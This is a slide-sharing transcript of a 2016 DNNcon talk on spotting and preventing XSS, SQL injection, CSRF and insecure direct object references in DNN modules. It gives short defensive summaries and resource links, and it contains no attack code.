DNNcon 2016: Are There Security Flaws in Your DNN Modules?
-
Upload
engage-software -
Category
Internet
-
view
201 -
download
1
Transcript of DNNcon 2016: Are There Security Flaws in Your DNN Modules?
@DNNConDon’t forget to include #DNNCon in your tweets!
Are There Security Flaws in Your Modules?Joshua Bradley / Web Developer
Engage Software@JRBradley1
@DNNConDon’t forget to include #DNNCon in your tweets!
THANKS TO ALL OF OUR GENEROUS SPONSORS!
@DNNConDon’t forget to include #DNNCon in your tweets!
Agenda• Introduction• Cross Site Scripting• SQL Injection• Cross Site Request Forgery• Insecure Direct Object References• Q & A
@DNNConDon’t forget to include #DNNCon in your tweets!
GoalFor Developers-To think about possible security vulnerabilities while developing your modules.
For Everyone -Be able to recognize potential vulnerabilities when testing websites.
@DNNConDon’t forget to include #DNNCon in your tweets!
Introduction
@DNNConDon’t forget to include #DNNCon in your tweets!
Cross Site Scripting
@DNNConDon’t forget to include #DNNCon in your tweets!
Reflective XSS
@DNNConDon’t forget to include #DNNCon in your tweets!
Reflective XSS
Example
@DNNConDon’t forget to include #DNNCon in your tweets!
Stored XSS
@DNNConDon’t forget to include #DNNCon in your tweets!
Stored XSS
Example
@DNNConDon’t forget to include #DNNCon in your tweets!
XSS Summary• Html Encode when not needing HTML
• Use Anti XSS library when needing to accept HTML from user input.
@DNNConDon’t forget to include #DNNCon in your tweets!
SQL Injection
@DNNConDon’t forget to include #DNNCon in your tweets!
SQLi
Example
@DNNConDon’t forget to include #DNNCon in your tweets!
SQLi Summary• Never do string concatenation with SQL.
• Use an ORM or Parameterized Stored Procedure.
@DNNConDon’t forget to include #DNNCon in your tweets!
Cross Site Request Forgery
@DNNConDon’t forget to include #DNNCon in your tweets!
CSRFExample
@DNNConDon’t forget to include #DNNCon in your tweets!
CSRF Summary• Use HttpPost
• ValidateAntiForgery• Never Allow Access from any host
@DNNConDon’t forget to include #DNNCon in your tweets!
Insecure Direct Object References
@DNNConDon’t forget to include #DNNCon in your tweets!
IDORExample
@DNNConDon’t forget to include #DNNCon in your tweets!
IDOR Summary• Use built in Folder and File Manager.
• Avoid using user input when selecting file.
@DNNConDon’t forget to include #DNNCon in your tweets!
Available on GitHub & Slideshare
•http://www.engagesoftware.com/blog/post/5052
@DNNConDon’t forget to include #DNNCon in your tweets!
Questions
@JRBradley1
@DNNConDon’t forget to include #DNNCon in your tweets!
Resources•https://www.owasp.org/index.php/OWASP_Top_Ten_Cheat_Sheet
• http://www.dnnsoftware.com/
wiki/analysis-of-dotnetnuke-compliance-
against-owasp-top-10-2013
@DNNConDon’t forget to include #DNNCon in your tweets!
Resources•http://www.troyhunt.com/2012/12/stored-procedures-and-orms-wont-save.html•https://www.owasp.org/index.php/Main_Page•http://www.jwaffinityit.com/Portals/28/Documents/DNN/Analysis%20of%20DotNetNuke%20compliance%20against%20OWASP%20Top%2010.pdf
@DNNConDon’t forget to include #DNNCon in your tweets!
Resources•https://msdn.microsoft.com/en-us/library/system.web.security.antixss.antixssencoder(v=vs.110).
aspx• https://
weblog.west-wind.com/posts/2012/Jul/19/NET-HTML-Sanitation-for-rich-HTML-Input
• http://www.computerweekly.com/
tip/Cross-site-request-forgery-Lessons-from-a-CSRF-attack-
example
@DNNConDon’t forget to include #DNNCon in your tweets!
Resources• http://
resources.infosecinstitute.com/dumping-a-database-using-sql-
injection/• https://www.sql-programmers.com/
sql-injection.aspx• https://msdn.microsoft.com/en-us/
library/bb386929.aspx• https://msdn.microsoft.com/en-us/
library/cc716760.aspx
@DNNConDon’t forget to include #DNNCon in your tweets!
Resources• http://www.troyhunt.com/
2013/07/everything-you-wanted-to-know-about-
sql.html• https://github.com/
malcomvetter/WidgetSender